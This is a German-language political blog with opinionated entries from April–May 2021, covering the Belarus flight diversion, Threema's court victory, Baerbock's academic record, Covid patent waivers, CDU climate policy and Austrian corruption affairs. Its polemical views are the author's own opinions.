Das mit Cat Stevens ist nochmal eine andere Kategorie, denn der Flieger ist ja im geplanten Zielland gelandet, und dass Flieger zu anderen Flughäfen umgeleitet werden, ist geradezu Usus (z.B. bei überraschend schlechtem Wetter).
Dann haben die "Faktenfinder" in der ARD einen gewohnt weitgehend faktenfreien Antirussland-Propagandaartikel veröffentlicht. Was an der Stelle besonders erstaunlich ist, weil Russland an der ganzen Aktion überhaupt nicht beteiligt war. Aber hey, kalte Krieger und alte Hunde kriegst du halt nicht umerzogen.
Ich verlinke das hier, weil es ein Detail hat, das ich sehr lustig fand:
Die Behauptung der Regierung in Minsk von einer Bombendrohung der Hamas wies die radikalislamische Palästinenerorganisation umgehend zurück.
Hamas so: OK, Leute, wir sind Terroristen, aber SO bekloppt wie der Lukaschenko sind wir nicht!!
Die rhetorische Methode des "Whataboutism" zur Ablenkung von sachlichen Debatten mittels Scheinargumenten wenden russische Akteure seit Jahren an.
Äh? Ablenkung? Wo wurde denn hier abgelenkt? Weißrussland hat hier eine zu verurteilende Handlung getätigt, die überregional zu Entsetzen und Empörung gesorgt hat. Der Hinweis auf Morales relativiert nicht diese Flugzeugentführung durch Weißrussland, sondern sie zeigt mit dem Finger auf die Heuchelei des Westens, die bei Morales nämlich nicht nur keine Überflugverweigerung gegen die USA in Erwägung gezogen haben, sondern sogar aktiv mitgemacht haben beim zur Landung zwingen des Fliegers von Morales.
Ich kann mich auch nicht erinnern, dass der Westen der Ukraine Überflugrechte aberkannt hat, als die den Flieger nach Weißrussland gekapert haben.
Der Westen spielt hier schlicht mit gezinkten Karten. Darauf weißt Russland hin, und sie haben völlig Recht damit. Der Westen hat so nachhaltig ihre angeblichen Werte verletzt, dass jede Empörung jetzt nur noch rituelles Geheuchel ist. Was Weißrussland getan ist ist natürlich trotzdem nach wie vor eine Riesensauerei und sie gehören dafür zur Rechenschaft gezogen. Wenn es denn nur eine gute Methode gäbe, sie zur Rechenschaft zu ziehen.
Update: Übrigens, wo wir gerade bei Whataboutism waren: Hier ist ein wunderbares Beispiel für Whataboutism. Dass die SCHON WIEDER mit ihren Verschwörungstheorien anfangen, dass das Virus aus einem chinesischen Labor kam. Ein klassisches Beispiel von Whataboutism! Klar, wir kriegen unsere Impfkampagne nicht auf die Reihe, wir haben so viele Impfgegner, dass wir Herdenimmunität nicht erreichen werden, ... oh guck mal da drüben, ein dreiköpfiger chinesischer Biolabor-Affe!!1!
Nach wie vor ändert das überhaupt nichts an irgendwas. Nur in Hollywood-Filmen hat das böse Biowaffenlabor im Keller das Gegengift herumliegen. Schon logistisch kann da gar nicht genug Gegengift für alle liegen, daher sind Hollywoodfilme an der Stelle immer schon soweit, dass die draußen alle tot sind und nur noch eine Dosis Gegengift gebraucht wird.

Tue May 25 2021

[l] Übrigens, aus aktuellem Anlass: Das ehemalige Nachrichtenmagazin 2013 zur Frage, ob die Morales-Umlenkung rechtens war. Ich zitiere:
Durften europäische Staaten der Maschine von Evo Morales das Überflugsrecht verweigern und sie so zur Landung in Wien zwingen? Ja, sagen Rechtsexperten. Jede Nation herrscht über ihren eigenen Luftraum. Erst recht, wenn es um Staatsflieger geht.
Seht ihr? War alles rechtens, was Weißrussland da gemacht hat!1!!
Wobei ich auch prima damit leben könnte, wenn wir da jetzt die Standards ändern und denn reziprog Flugrechte verweigern. American Airlines, Delta und co dürfen dann ab jetzt auch nicht mehr die EU anfliegen, ja? Verstehe ich das richtig?
Könnte ich gut mit leben. Keine Fluglinien aus Terrorregimes in der EU!
Da müsste man eigentlich auch alle Länder einschließen, die bei US "Rentitions" mitgemacht haben. Wer war das noch gleich? UK? Schweden?
Und Länder, die an Drohnenmorden mitwirken.
Und schwupps, sage ich euch, haben wir die Ziele der Grünen erreicht, endlich aus Umweltschutzgründen den Flugverkehr abzuschaffen.
[l] Tesla hat in Norwegen eine fünfstellige Strafe pro Kunde aufgebrummt gekriegt, weil sie nach dem Kauf per Softwareupdate die Ladegeschwindigkeit und Akkukapazität beschränkt haben.
Das haben sie gemacht, weil beides gut und wichtig für die Akku-Lebensdauer ist. Tesla hat das hier also eigentlich gut gemeint, aber sie haben halt vorher den Kunden unter Vortäuschung falscher Tatsachen die Autos verkauft. Du kannst nicht einem Kunden ein Auto unter Anpreisung der Reichweite verkaufen, und dann die Reichweite per Softwareupdate senken.

Wed May 19 2021

[l] Giffey tritt wegen der Plagiatsaffäre zu ihrer Doktorarbeit zurück.
Auf der einen Seite: Warum erst jetzt?
Auf der anderen Seite hat sie damit Punkte gutgemacht. Das heißt, dass sie eine nachweisbare Mindestmenge an Restintegrität hatte. Der Schäuble mit seinem Schwarzgeld ist nicht nur immer noch im Amt, der ist sogar mehrfach befördert worden.

Tue May 18 2021

[l] Gute Nachrichten aus der Schweiz:
Der Schweizer Messenger-Anbieter Threema hat vor dem obersten Gericht des Landes einen Sieg gegen das eidgenössische Justiz- und Polizeidepartement (EJPD) errungen.
Die Geheimdienste fanden, Threema sei ein "Fernmeldedienstanbieterin im Sinne des BÜPF" und müsse daher eine Vorratsdatenspeicherung vornehmen und die Identitäten ihrer Nutzer jederzeit für die schleimigen Tentakel der Geheimdienste griffbereit vorhalten.
Dass Threema jetzt schon in zweiter Instanz gesiegt hat, sieht wie ein gutes Zeichen aus, aber ich würde das so werten, dass die dann halt die Gesetze anpassen werden, damit Threema darunter fällt.
So ein Überwachungs- und Polizeistaat, der die Privatsphäre seiner Bürger mit Füßen tritt, der fällt ja nicht vom Himmel. Da steckt jahrelange harte Arbeit der unmoralischen und ethikfreien Psychopathen dahinter, die gerne kleines Rädchen in einer Unterdrückungsbehörde eines Polizeistaates sein möchten.
Wie attraktiv das ist, unterschätzt man glaube ich als normaler Mensch mit Anstand und Moral gerne. Die meisten Polizisten wollen ja auch Verbrecher fangen und nicht die Grundrechte Unschuldiger mit Füßen treten. Trotzdem, wenn man ihnen Zugriff auf einen Computer gibt, mit dem sie anderer Leute Privatsphäre verletzten können, dann gucken sie vor oder nach einem Date gerne mal nach, was da über die neue Bekanntschaft steht.
Das heißt nicht, dass das alles Unmenschen sind. Eher dass die Versuchung zu groß ist, wenn man so ein Machtmittel vorhält. Daher sollte man als Demokratie oder Rechtsstaat sowas gar nicht erst haben.
Wenn ihr mal kurz selber gucken wollt, wie sich in Deutschland die Verbrechensrate pro 100k Einwohner seit 1990 entwickelt hat: Bitteschön.
Wenn jemand noch weiter zurück gehende Daten findet: Bitte gerne her damit.
Hey Fefe, wieso geht denn 2016 die Verbrechensrate so stark hoch? Meine Vermutung: Die Sexualstrafrechtsreform, mit der sie einen Haufen vorher nicht strafbarer Dinge verboten haben, u.a. "Anscheinsjugendpornographie".
Was soll das denn sein, fragt ihr? Na wenn ein geriatrischer CSU-Richter findet, dass ein Porno-Foto mit ausschließlich volljährigen Darstellern aber so aussehen könnte, dass jemand da doch noch nicht ganz volljährig ist. Oh, und: Es zählt auch als Kinderpornographie, wenn gar kein Kind beteiligt ist, z.B. weil es sich um eine Zeichnung handelt, für die der Urheber kein Live-Vorbild hatte. Ach ja, und wenn sich zwei verliebte Teenager gegenseitig Nacktfotos zuschicken, ist das seit dem auch eine Straftat. Zustände wie bei den Puritanern. Kein Wunder also, dass da die "Verbrechens"rate hoch ging.
Mir ist an dieser Stelle der Hinweis wichtig, dass das ein inhärentes Problem aller Organisationen ist, die irgendwas bekämpfen wollen. Wisst ihr, warum in den USA Cannabis als Rauschgift eingestuft wurde? Die eine Hälfte davon hatte ich schon im Blog. Hier ist die 2. Hälfte, wo das ursprünglich herkommt. Das war ein Doppel-Whammie. Die eine Hälfte war purer Rassismus gegen mexikanische Einwanderer. Googelt mal Reefer Madness, das war ein einflussreicher Propagandafilm, der Cannabis nachsagte, dass es die Leute zu mordenden Monstern macht, die keinen Schmerz mehr spüren. Der Film war von 1936. 1937 kam das Verbot. Hier gibt es eine kurze Zusammenfassung. Was da eher nur zwischen den Zeilen steht: 1933 brach die Prohibition zusammen, und die ganze staatliche Infrastruktur zum Verfolgen von Alkoholstraftaten hatte plötzlich keine Arbeit mehr. Was tun? Na klar, die brauchten etwas neues, das sie verfolgen konnten! Enter Cannabis.
Das ist ein häufig zu beobachtendes Phänomen. Wenn es eine Organisation gibt, die irgendwas bekämpfen will, kann die nie fertig werden, weil sie dann nicht gebraucht würde. Und die stärkste Kraft in allen Organisationen ist der Selbsterhalt und Einflussausbau. Was tut man also, wenn man am Siegen ist? Man ändert die Kriterien! Daher mussten bei uns immer und immer mehr Dinge unter "Kinderpornographie" fallen, denn sonst hätte man angesichts der Fallzahlen nur knapp über der Nachweisgrenze arbeitslos werden müssen. Der andere Trick ist, die Fallzahlen einfach durch hemmungsloses Lügen aufzublasen. Wenn sie z.B. ein Forum hopsnehmen und da im Log 20000 Zugriffe finden, dann erklären sie einfach in der Presse, die hätten 20000 Täter dort gehabt, auch wenn 15000 davon vom selben Account kamen.
Mit Schusswaffen sieht das übrigens ähnlich aus. Die meisten Fälle von fetten Waffenlagern waren schussunfähig gemachte Sammlerstücke oder der Typ hatte gar keine passende Munition. Aber ob die gefundene Munition zu den Waffen passt, das guckt die Polizei lieber gar nicht erst.
So sieht das auch mit Verkehrsunfällen aus:
Verkehrstote in Deutschland sind von über 100/100.000 Autos/Jahr bis 1970 auf unter 10/100.000 Autos/Jahr seit 1995 gefallen.
Das kann die Polizei aber natürlich nicht einfach geschehen lassen, sonst fragt am Ende noch jemand, wozu wir eigentlich die ganzen Verkehrs-Cops bezahlen müssen. Also kontrollieren die jetzt halt auch Fahrradfahrer und verteilen Knöllchen für "kein Helm" oder "Reflektor fehlt". Was man halt so tun muss, um die Statistik hoch zu halten.
Genau so ist das auch mit der "Hassrede". Man senkt einfach solange die Kriterien, bis man genügend Fälle für eine Empörungssimulation zusammen hat. Dann redet man von dringendem Handlungsbedarf und macht ein paar Unterdrückungsgesetze, und schwupps hat man wieder einen Grund für die Schaffung einer neuen Behörde, die Führungspersonal brauchen, das man mit abgehalfterten Politikern besetzen kann.
Das ist nicht nur böse Absicht, versteht mich nicht falsch. Das ist auch eine Frage der Psychologie. Das Framing ist wichtig. Der Mensch guckt sich das an und sagt: Boah, also zumindest die schlimmsten 10% sollten wir weg kriegen. Dann kriegst du die 10% weg, und dann? Es wird immer "die schlimmsten 10%" geben, egal wie häufig du oben 10% wegnimmst. Da ändert sich dann eben das Bezugsmodell.

Sun May 16 2021

[l] Manchmal sagen ja die Dementis mehr als der Vorwurf.
Seit ein paar Wochen beschäftigen sich im Internet einige Wadenbeißer damit, dem Lebenslauf von Annalena Baerbock hinterher zu recherchieren. Soweit ich sehen kann nicht gänzlich erfolglos. Da gab es so Vorfälle wie dass die Boell-Stiftung ein Lebenslauf zu ihr nachträglich "korrigieren" musste, und dann war das Studium, mit dem sie hausieren ging, plötzlich doch gar nicht abgeschlossen.
Für mich ist ja, unter uns, auch ein abgeschlossenes Politologie-Studium nicht satisfaktionsfähig. Da haben wir mehr als genug von, und keiner ist mir bisher positiv aufgefallen.
Insofern habe ich diesen Baerbock-Kram belustigt aus der Ferne verfolgt. Aber jetzt gibt es ein Dementi, und damit haben die Grünen selbst die Vorwürfe diskursfähig gemacht.
Gucken wir doch mal.
"Annalena Baerbock hat in Hamburg und London studiert und ihr Studium an der [London School of Economics & Political Science] mit einem Master of Laws in Public International Law abgeschlossen.
Public International Law ist Völkerrecht.
Völkerrechtler sind die, die nach Flugzeugabschüssen über der Ukraine in Talkshows sitzen und unverbindlich ihre Meinung erzählen, als sei das bindendes internationales Recht.
Die Studienleistungen in Hamburg waren Voraussetzung für die Aufnahme an der LSE
Für Nicht-Akademiker unter euch: Das ist eine Nullaussage. Ihr wurden Semester angerechnet.
Zuvor war, vor allem in Rechten Netzwerken, immer wieder der Vorwurf laut geworden, dass Baerbock bei ihrem Lebenslauf getrickst und gar nicht an der Elite-Universität in London studiert haben könnte.
Da musste ich doch hart lachen, denn die LSE (London School of Economics) ist schon in Yes Minister immer wieder der Running Gag gewesen als Pseudo-Uni, die niemand ernst nimmt, schon gar nicht jemand, der auf einer richtigen Uni war. Wie Oxford oder zur Not auch Cambridge. Elite-Uni? HAHAHAHA! You had me at "economics" LOL!
Die Begründung: Sie habe keinen Bachelor-Abschluss in Hamburg machen können, weil es den zu dieser Zeit noch gar nicht gab.
OK und an dieser Stelle dachte ich mir, da musst du mal was zu bloggen. Das ist einer der wichtigsten Indikatoren dafür, dass man gerade verarscht wird, wenn die sich gegen "Vorwürfe" verteidigen, die niemand gemacht hat. Selbstverständlich hat man damals bei der Umstellung Verfahren gehabt, wie man sich ein Vordiplom oder einzelne Scheine anrechnen lassen konnte. Völlig absurd. DAS war NICHT der Vorwurf. Der Vorwurf war, dass sie bloß ein Vordiplom gemacht hat und dann so tat, als habe sie einen echten Abschluss gemacht. Als jemand, der sein Studium selber nicht beendet hat, kann ich euch sagen: Wer ein Vordiplom für erwähnenswert hält, der hat eine Hand voller Luschen und versucht einen Bluff.
Grünen-Wahlkampfsprecher Kappler veröffentlichte aber auch ein Bild vom Abschluss Baerbocks in Hamburg, wo sie Politische Wissenschaft auf Diplom mit Nebenfach Öffentliches Recht/Europarecht studiert hatte. Ihre Diplom-Vorprüfung legte Baerbock dort mit der Note 1,3 ab.
Wenn ihr genau lest, stellt ihr fest, dass sie hier wieder so tun, als sei das Vordiplom (das ihr bei der LSE angerechnet wurde) der Abschluss sei. So jedenfalls mein Verständnis. Diplom-Vorprüfung = Vordiplomsprüfung. Irre ich?
Wieso ist sie dann zur LSE gegangen, wenn das schon der Abschluss war?
Unter uns? Ich habe ja noch nie verstanden, wieso die Leute so darauf stehen, ein Stück Papier herumzuzeigen. Der Abschluss an der Uni ist doch nicht die Lebensleistung! Die Leistung NACH dem Studium ist die Lebensleistung! Die Uni ist die Ausbildung für die Leistung danach!
Dass es hier gerade überhaupt eine Debatte darüber gibt, was die Frau Baerbock an der Uni gemacht hat, zeigt mir vor allem eine Sache: Sie hat keine Lebensleistung vorzuweisen. Das Einzige, was sie hat, ist ein abgebrochenes Studium. Und das versucht sie gerade mit gezielt mehrdeutigen Formulierungen wie "hat an der Uni soundso studiert" so klingen zu lassen, als habe sie da einen echten Abschluss gemacht. Hat sie nicht.
Soweit ich weiß wäre auch ein Master im Völkerrecht bei den Juristen nicht viel wert. Erst nach einem Staatsexamen ist man Volljurist. Aber für ein Staatsexamen muss man in Jura halt richtige Jura studieren und nicht Völkerrechts-Blablah.
Übrigens, am Rande. Die Vorwürfe, die ich sah, waren eher in die Richtung "die hat da an der LSE ein paar Kurse besucht, bei denen es einen Schein ohne Prüfung gab, nur für die Anwesenheit".
Das hätte ich ja für Bullshit gehalten, wenn sie nicht dieses lächerliche Dementi hier produziert hätten.
Ja aber Fefe, wieso gucken die Leute immer nur bei den armen Frauen so genau hin?! Als ob die Männer in der Politik nicht alle Schmalspur-Anwesenheitsschein-Laberscheiß studiert hätten, und sich jetzt mit ihren akademischen Bullshit-Errungenschaften aufzublasen versuchen!1!!
Also erstmal: Die will Kanzler werden. Das sollte man halt nicht machen, wenn der Lebenslauf dann nicht aushält, dass mal jemand ein bisschen genauer hinguckt.
Zweitens: Der Laschet hat das ja auch abgekriegt neulich, war das die Anstalt oder die Heute Show? Dessen Lebenslauf ist im Wesentlichen Katholiken-Klüngel inklusive Stipendium der Konrad-Adenauer-Stiftung. Aber wisst ihr was? Der Laschet hat ein Staatsexamen gemacht. Der ist Volljurist!
Und wie so häufig, wenn jemand etwas erwähnenswertes erreicht hat, dann hat er es nicht nötig, damit hausieren zu gehen. Der Laschet ließ das nicht in Talkshows heraushängen, dass er Volljurist ist. Das fand der ganz normal, dass man was vorzuzeigen hat, wenn man Kanzler werden will.
Das war bestimmt gar nicht so einfach für die Grünen, jemanden aufzustellen, der weniger vorzuweisen hat als der Laschet. Aber was sollen sie machen, sie hatten die Baerbock mit ihren Teilnahmeurkunden und sie hatten den Habeck, der ist Schweinebauer, wie die Baerbock ihn in dem Clip wunderbar abkanzelt. Nachdem ich das gesehen habe, gönn ich der das auch, dass da mal jemand ein bisschen herumstochert in ihrem Völkerrecht.
Wollt ihr eigentlich mal gucken, was der Habeck wirklich geleistet hat?
Von 1996 bis 1998 absolvierte Habeck ein Promotionsstudium der Universität Hamburg und wurde 2000 zum Doktor der Philosophie mit einer Arbeit über literarische Ästhetizität promoviert.
Schweinebauer, my ass. Der hat fucking promoviert und mehrere Bücher geschrieben!
Also nicht dass ich den jetzt als Kanzler haben wollte, der ist immer noch bei den Grünen. Die haben den ersten Angriffskrieg in der Geschichte der Bundesrepublik Deutschland gemacht, die kriegen von mir garantiert niemals eine Stimme. Aber Habeck muss nicht mit Vordiplomen in Talkshows blenden. Und er hat es auch nicht nötig, der Baerbock an den Karren zu fahren, wenn sie ihn als Schweinebauer kleinzureden versucht.
Der weiß nämlich genau: Was Peter über Klaus sagt, sagt mehr über Peter als über Klaus.
Update: Ein Leser widerspricht:
Laschet ist _kein_ Volljurist!
Der hat nämlich nur das erste Staatsexamen -- das zweite (und mutmaßlich auch das Referendariat) fehlen ihm.
Je nach Uni bedeutet das: Ohne Abschluss. (Einige Unis bieten einem heutzutage dann wenigstens einen Diplom-Juristen oder einen LL.B. an, damit man wenigstens etwas vorzeigen kann)
Update: Ein anderer Leser widerspricht diesem Leser:
Der Satz "Je nach Uni bedeutet das: Ohne Abschluss." ist falsch. Das erste juristische Staatsexamen ist nämlich die Abschlussprüfung des Universitätsstudiums. Was Herrn Laschet dann fehlt ist mit dem zweiten Staatsexamen die Befähigung zum Richteramt, welche wiederum Voraussetzung auch für andere Berufe (Rechtsanwalt...) ist. Er hat aber ein abgeschlossenes Studium.
Update: Die Primärquelle für die akademischen Leistungen von der Baerbock findet sich auf Twitter, wo es der Wahlkampfsprecher der Grünen publiziert hat.

Wed May 12 2021

[l] Das Deutsche Modell macht Schule. Genau wie wir hier Astrazeneca madig gemacht haben, macht die Slowakei jetzt Sputnik V madig. Da seien Dinge drin, der Vertrag sei schlecht und aus einer schwachen Position (u.a. garantiert Russland wohl nicht die Wirksamkeit und wird auch bezahlt, wenn die vereinbarten Dosen nicht abgenommen werden), und wir setzen jetzt erstmal aus und prüfen.
Nach der Prüfung wird das Zeug keiner mehr haben wollen, vermute ich mal.
Das klingt jetzt doof mit den Klauseln in dem Vertrag, aber auf der anderen Seite ist das ja wohl internationaler Standard, dass verhandelnde Behörden nicht in der Lage sind, ordentliche Verträge aufzusetzen. Dass Russland in jedem Fall bezahlt werden will finde ich nachvollziehbar. Die sind ja nicht doof und wissen, was für Methoden der Westen gegen sie einsetzt. Warum sollen die dann auf den Produktionskosten sitzenbleiben, nur weil der Westen eine erfolgreiche Kampagne fährt?
Die Wirksamkeit nicht zu garantieren erscheint mir jetzt auch nicht völlig abwegig. Dafür sind die jeweiligen Gesundheitsbehörden zuständig, zu gucken, ob ihnen die Wirksamkeit genügt. Damit wollen die einfach frivolen Klagen aus dem Weg gehen, wenn keiner mehr nachweisen kann, wer eigentlich wann mit was geimpft wurde beziehungsweise die nötigen Unterlagen von der Klägerseite kommen, die möglicherweise eine politische Kampagne gegen Russland fahren wollen.
So riecht das hier übrigens auch gerade, denn inzwischen gab es eine Regierungskrise in der Slowakei, über die der Ministerpräsident gestürzt ist (der gibt jetzt den Finanzminister).

Sat May 8 2021

[l] Das Gute an korrupten Opportunisten wie der CDU ist ja, dass manchmal eine Lage existenziell bedrohlich genug aussieht, dass der Opportunismus die Korruption überstimmen kann.
Das hatten wir beim Atomausstieg, und jetzt sieht es so aus, als passiere das mit der Klimakatastrophe wieder.
Der Vorsprung der Grünen in den Umfragen und das Urteil des Bundesverfassungsgerichts zwingen die Union zu einer rasanten Kehrtwende bei der Klimapolitik.
Lustigerweise gibt es ja so diesen "nur Nixon konnte nach China gehen"-Effekt, der hier glaube ich auch greift. Nixon als verstrahlter Antikommunist konnte nach China gehen. Wenn jemand anderes nach China gegangen wäre, hätte Nixon sie im Wahlkampf damit plattgemacht.
Nur die CDU konnte den Atomausstieg beschließen. Jeder andere wäre im Wahlkampf von der CDU plattgemacht worden.
Nur die SPD konnte den Sozialstaat zerstören. Jeder andere wäre im Wahlkampf von der SPD plattgemacht worden.
Und jetzt kann nur die CDU gegen die Klimakatastrophe vorgehen. Jeder andere wäre von der CDU im Wahlkampf als Wirtschaftszerstörer verunglimpft und plattgemacht worden.
Die Frage ist bloß, ob die CDU das ohne die FDP machen kann. Ich hoffe mal.
Wie sehr die Grünen die Klimakatastrophe bekämpfen wollen, zeigt gerade der Kretschmann ganz anschaulich. Zu mehr als leeren Versprechungen reicht es nicht, denn sonst verliert er die nächste Wahl. Und der Machterhalt war noch jedem Politiker wichtiger als seine Versprechungen vor der Wahl oder der Untergang unserer Spezies.

Fri May 7 2021

[l] Habt ihr euch schon von der Anstalt über CDU-Korruptionsaffären erholt?
Könnt ihr noch?
Dann empfehle ich das ZDF Magazin Royale über die ÖVP-Korruptionsaffären in Österreich.
Wieso läuft das im ZDF? In Österreich gibt es doch auch unabhängigen öffentlich-rechtlichen Rundfunk?
Ich muss sogar sagen, dass ich deren Nachrichten ("Zeit im Bild") immer deutlich cooler fand als die Tagesschau. Sind es die fescheren Anzüge? Der coole Dialekt? Keine Ahnung. Hier ist eine aktuelle Folge, könnt ihr euch ja mal anschauen. Vielleicht geht es euch auch so.
Jedenfalls ist der ORF tatsächlich eigentlich unabhängig, und sie wollten auch eine schöne satirische Sendung über das korrupte Netzwerk von Kanzler Kurz machen. Das ist dann unter dubiosen Umständen nach Ankündigung wieder gecancelt worden, weil da jemand Druck gemacht hat.
Tja und da springt halt der Böhmermann ein und leistet Amtshilfe.
Das Ergebnis ist mir zwar ein bisschen zu flapsig aber inhaltlich solltet ihr euch das mal in Ruhe angucken. Das ist jetzt schon so krass eskaliert, dass der Verfassungsgerichtshof offen mit einer Zwangsvollstreckung drohen musste, damit die angeforderten Akten rausgerückt werden. Und womit haben die sich rauszureden versucht? Mit Datenschutz!
Es gab eine Hausdurchsuchung beim Finanzminister. Da versteckte seine Frau den Laptop mit dem belastenden Material in ihrem Kinderwagen und machte sich auf in den Park.
Dann gibt es da einen Untersuchungsausschuss zu der Ibiza-Affäre um Vizekanzler Strache, aber der Vorsitzende ist gleichzeitig jemand, den der Ausschuss hätte vernehmen sollen, weil er verdächtig ist. Das war der Kontext seinem Vorschlag, die Wahrheitspflicht abzuschaffen.

Thu May 6 2021

[l] Ich werde ja seit einiger Zeit gefragt, warum ich immer nur an der Covid-Politik herumkritisiere, was ich denn an deren Stelle gemacht hätte.
Meine Antwort war dann immer: Es gibt extra Paragraphen für Pandemien, dass man den Patentschutz aussetzen kann. Die Bundesregierung hätte den Patentschutz aussetzen sollen, dann hätte sie die Pharmafirmen in der EU (Bayer und co) zwingen können, den Impfstoff herzustellen. Am Ende wären alle entschädigt worden, das wäre teuer geworden, klar, aber nicht so teuer wie die Covid-Hilfen, die dieser bisher einjährige Jojo-Scheiß gekostet hat.
Stellt euch meine Überraschung vor, wenn ich jetzt lese, dass die Amis den fucking Patentschutz für Covid-19-Medikamente aussetzen.
DIE AMIS! Die Hauptstadt des Kapitalismus! DIE setzen den Covid-Patentschutz aus. Aber wir sind nach einem Jahr ruinösem Jojo-Lockdown-Light immer noch zu blöde dafür.
Unfassbar.
Die WHO ist übrigens begeistert, dass die Amis den Patentschutz aussetzen.
Alle wussten die ganze Zeit, dass das nicht nur eine gute sondern die rettende Idee ist!
Update: Hey, warum eigentlich nur für Covid-Impfstoff den Patentschutz aussetzen? Warum nicht auch für, sagen wir mal, Insulin?

Fri Apr 30 2021

[l] Boah dieser Altmaier, von dem krieg ich inzwischen echt Pickel.
Der hat es echt geschafft, sich an Gestalten wie Kohl und Merz vorbeizuarbeiten auf Platz 1 meiner persönlichen Hassliste.
Iht habt ja wahrscheinlich mitgekriegt, dass das Bundesverfassungsgericht die "Klimapolitik" der Bundesregierung abgesägt hat. Und da braucht es natürlich kein Verfassungsgericht, um das zu erkennen, dass die da Brandrodung auf Kosten zukünftiger Generationen betreiben.
Keine einzelne Person steht dabei wie Altmaier für Brandschatzen am Planeten. Erst hat er Solarenergie in Deutschland kaputtgemacht, dann Windenergie, und jetzt fragt ihn das ehemalige Nachrichtenmagazin hinter einer Paywall zu dem Urteil. Ich zitiere nur mal zwei Sätze daraus. Die reichen schon für Bluthochdruck.
Erstens:
Die Entscheidung gibt uns die Chance, für mehr Generationengerechtigkeit zu sorgen
WAT?! Seit Jahrzehnten ist der Altmaier systematisch jeder Chance in Richtung Aufhalten der Klimakatastrophe aktiv ausgewichen, hat jede Chance zur Herbeiführung des Weltuntergangs durch die Klimakatastrophe aktiv genutzt, und der WAGT es jetzt so zu tun, als habe er bisher bloß nie die Chance gehabt, sich gegen statt für den Weltuntergang zu engagieren?!?
Ich bin ja ein Pazifist, aber da krieg ich echt Gewaltfantasien.
Zweitens:
Wir haben nur noch wenige Wochen, bis zum Ende der Wahlperiode und müssen deshalb schnell und zügig handeln. Gegenseitige Schuldzuweisungen lenken von diesem Ziel ab und schaden dem Ziel des Klimaschutzes.
Wisst ihr, was mir da schlagartig klar wurde, als ich das las?
Der Altmaier fährt hier das Israel-gegen-Palästina-Programm. Erst alles plattbomben. Dann den Wiederaufbau sabotieren wo es geht. Dann ansagen, dass die mit ihrem Geheule ja den Friedensprozess behindern.
Das ist direkt dasselbe Playbook.
Erst macht Altmaier Flechenbombardement über dem Solarstrom, dann phosphorbombt er die Windenergie weg, dann tut er so, als habe er bloß noch nicht genug Chancen gehabt, mal etwas FÜR den Planeten statt gegen ihn zu tun und am Ende versucht er noch seinen Waldflächenbrand den Kids in die Schuhe zu schieben, die es wagen öffentlich anzusagten, dass sie gerne nicht von ihm umgebracht werden würden.
Kennt jemand "die Wirtschaft", für die der Altmaier das tut? Ich würde gerne mal den CEO sehen, der das gut findet, dass hier seinen Kindern das Biotop zerschossen wird.
Update: Wer noch mal gucken wollte, wieso ich so auf den Altmaier eindresche: Die Anstalt über den Altmaier-Knick.
[l] Oh ach gucke mal, Österreich hat das LG Hamburg gesehen und gesagt: Hold My Beer!
Die haben sich da gerade eine schöne Piefke-Abmahn-Pipeline aufgebaut in Österreich, mit der sie jetzt die Deutschen in aller Ruhe zur Ader lassen. Und keine der beteiligten Instanzen hat auch nur den geringsten Anreiz, irgendwas genauer zu prüfen oder für zu hoch zu befinden oder gar als rechtsmissbräuchlich abzulehnen.
Ich kann ihnen das nicht übelnehmen.
Nach dem, was Deutschland mit dieser Kochbuch-Abmahnnummer gemacht hat?
Und es ist ja auch Deutschland, was immer noch jedes Jahr einen Scheit vom Baum des Rechtsstaats nachlegt, wenn es um Verlängerung oder Verschärfung von Urheberrecht geht. Rein von der Karma-Bilanz her haben wir das nicht besser verdient. Wir wählen seit Jahrzehnten immer wieder dieselben Urheberrechtsfanatiker.
Und jetzt? Jetzt kaufen wir auch noch vom Urheberrechts-Maximisten Smudo eine Covid-App. Ja nee klar.
Es ist wirklich schade, dass die Abmahnmafia immer irgendwelche Passanten und alleinerziehende Mütter umnietet und nicht mal jemanden wie Smudo oder Internet-Vorzensur-Politiker mit ihren Uploadsperren, die Artikel 5 des Grundgesetzes nicht kennen.

Wed Apr 28 2021

[l] Old and busted: Schusswaffenenthusiast.
New hotness: Radioisotope-Enthusiast!
Hallo Herr Wachtmeister? Ich habe in meiner Garage diese Kaffeedose gefunden, wo jemand von Hand ein Radioaktivitäts-Warnzeichen aufgemalt hatte.
Die ist mir runtergefallen, als ich mit meiner Anglerausrüstung gegenkam. Da fielen so Steine raus. Die hab ich wieder reingetan.
LOL
Und die Polizei so:
"Die standen 15 Minuten später mit der ganzen Brigade vor der Tür", erklärt der aufgeschreckte Garagen-Entrümpler. Er kam daraufhin sofort in ein Krankenhaus. [...]
Die Feuerwehr, die mit Spezialfahrzeugen wie einem Messzug, einem Dekontaminierungsfahrzeug und Spezialkräften zur Stoffbestimmung anrückte, untersuchte die drei Materialbrocken in der Dose, verschloss den Fund in einem Fass und versiegelte die Garage, wie die Polizei am Dienstagmorgen bestätigte.
(Danke, David)

Mon Apr 26 2021

[l] Wo geht es eigentlich hin mit der Digitalisierung? Was ist da das Ziel?
Ein Leser hat da ein Dokument des Bundesinstituts für Bau-, Stadt- und Raumforschung gefunden. Da steht auf Seite 43, Rubrik "Digitalisierung zielorientiert gestalten", Überschrift "Visionen einen hypervernetzten Planeten" folgende Vision:
6. Post-voting society
Da wir genau wissen, was Leute tun und möchten, gibt es weniger Bedarf an Wahlen, Mehrheitsfindungen oder Abstimmungen. Verhaltensbezogene Daten können Demokratie als das gesellschaftliche Feedbacksystem ersetzen.
Gut, dass diese Unterlagen auf Alpha Centauri jemand gefunden hat, bevor die Vogonen den Planeten plattgemacht haben. (Danke, Jörg)

Sat Apr 24 2021

[l] Cory Doctorow über gewerbliche Internetzensur. Es geht um Kriegsverbrecher, Diktatoren, Folterer. Ein Journalist oder Whistleblower publiziert was über sie. Sie wollen das weghaben.
Stellt sich raus: Da gibt es kommerzielle Dienstleister für. Was machen die dann so? Die haben 300+ Fake-Zeitungen irgendwo gehostet, da packen sie dann eine Kopie deines Artikels hin, aber rückdatiert. Dann sorgen sie dafür, dass ihr Fake-Artikel in einer spanischen Copyright-Registratur eingetragen ist. Dann schicken sie deinem Hoster Takedown-Notices.
Wenn das nicht fruchtet, dann schicken sie deinem Hoster anwaltlich aussehende Briefe, die behaupten, dein Artikel verstöße gegen die Datenschutzgrundverordnung.
Wenn ihr mal konkrete Drohemails sehen wollt, die da so verschickt wurden: Qurium hat welche online. Besonders geil: Die eine DSGVO-Takedown-Mail behauptete, von der Rechtsabteilung der EU-Kommission zu kommen.
